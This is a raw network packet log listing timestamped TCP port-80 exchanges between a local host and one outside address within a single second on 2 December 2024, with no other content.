                                                                                                                                                                                                        Dec 2, 2024 07:37:58.023677111 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.023689985 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.023750067 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.024748087 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.024837971 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.024899006 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.025758028 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.025873899 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.025940895 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.026774883 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.026788950 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.026849985 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.027755976 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.027822018 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.027915955 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.028795004 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.028877020 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.028950930 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.029747009 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.029876947 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.030765057 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.030843019 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.030858994 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.031716108 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.031805038 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.031864882 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.031930923 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.032712936 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.032780886 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.032870054 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.033647060 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.033744097 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.033849001 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.034595013 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.034713984 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.035602093 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.035614014 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.035693884 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.036515951 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.036617041 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.036703110 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.037492037 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.037563086 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.037630081 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.038417101 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.038480043 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.038537025 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.039316893 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.039457083 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.039520025 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.040235996 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.040354967 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.040852070 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.041158915 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.041204929 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.042081118 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.042160988 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.042201996 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.043035984 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.043128967 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.043148994 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.043226004 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.043942928 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.044076920 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.044241905 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.044883966 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.045017004 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.045099020 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.045825958 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.045938969 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.046755075 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.046873093 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.046897888 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.047683001 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.047759056 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.047785997 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.047836065 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.048603058 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.048803091 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.049560070 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.049638987 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.049666882 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.050487041 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.050573111 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.050695896 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.050817966 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.051425934 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.051527977 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.051594973 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.052354097 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.052447081 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.052515984 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.053272009 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.053323030 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.053388119 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.054188967 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.054296970 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.055124998 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.055187941 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.055219889 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.056935072 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.193697929 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.193784952 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.193871021 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.194020033 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.194139957 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.194222927 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.194922924 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.194936037 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.194974899 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.195808887 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.195949078 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.196634054 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.208219051 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.208374023 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.208534002 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.208674908 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.208744049 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.209723949 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.209770918 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.209801912 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.210521936 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.210586071 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.210608006 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.210632086 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.211440086 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.211556911 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.211620092 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.212362051 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.212431908 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.212481022 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.213258982 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.213380098 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.213438034 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.214181900 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.214348078 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.215147972 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.215220928 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.215251923 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.216042995 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.216114998 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.216151953 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.216196060 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.216959000 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.217061996 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.217123985 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.217864037 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.218053102 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.218094110 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.218811035 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.218955994 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.219715118 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.219770908 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.219790936 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.220629930 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.220642090 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.220657110 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.220680952 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.221940041 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.222071886 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.222138882 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.222444057 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.222681046 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.222723961 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.223345995 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.223448038 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.224289894 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.224406004 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.224431038 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.224651098 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.225188017 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.225320101 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.225373983 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.226123095 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.226255894 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.226330042 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.227025032 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.227118969 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.227169037 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.227998018 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.228080034 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.228565931 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.228899002 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.228971958 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.229779959 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.229867935 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.229937077 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.230802059 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.230859995 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.230886936 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.230956078 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.231756926 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.231944084 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.231992960 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.232539892 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.232705116 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.232763052 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.233447075 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.233540058 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.233589888 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.233689070 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.234399080 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.234464884 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.234508038 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.235331059 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.235343933 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.235414028 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.236232996 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.236433029 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.236676931 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.237133980 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.237232924 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.237719059 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.238079071 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.238343000 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.238396883 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.238939047 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.239108086 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.239176989 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.239870071 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.239995956 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.240080118 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.240993023 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.241005898 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.241086006 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.241715908 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.241769075 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.242018938 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.242153883 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.242670059 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.242789030 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.243525028 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.243583918 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.243662119 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.244469881 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.244527102 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.244641066 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.244698048 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.245389938 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.245515108 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.245584011 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.246311903 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.246412992 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.246460915 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.247251987 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.247363091 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.248122931 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.248220921 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.248250961 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.249000072 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.249044895 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.249178886 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.249284983 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.249955893 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.250073910 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.250144005 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.250890970 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.251000881 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.251784086 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.251838923 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.251887083 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.252635002 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.252763987 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.252803087 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.252859116 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.254894972 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.395116091 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.395299911 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.395406008 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.395539045 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.395643950 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.395698071 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.396431923 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.396548033 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.396629095 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.397342920 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.409467936 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.409521103 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.409529924 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.409718037 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.409869909 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.409931898 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.410630941 CET8049719185.215.113.16192.168.2.8
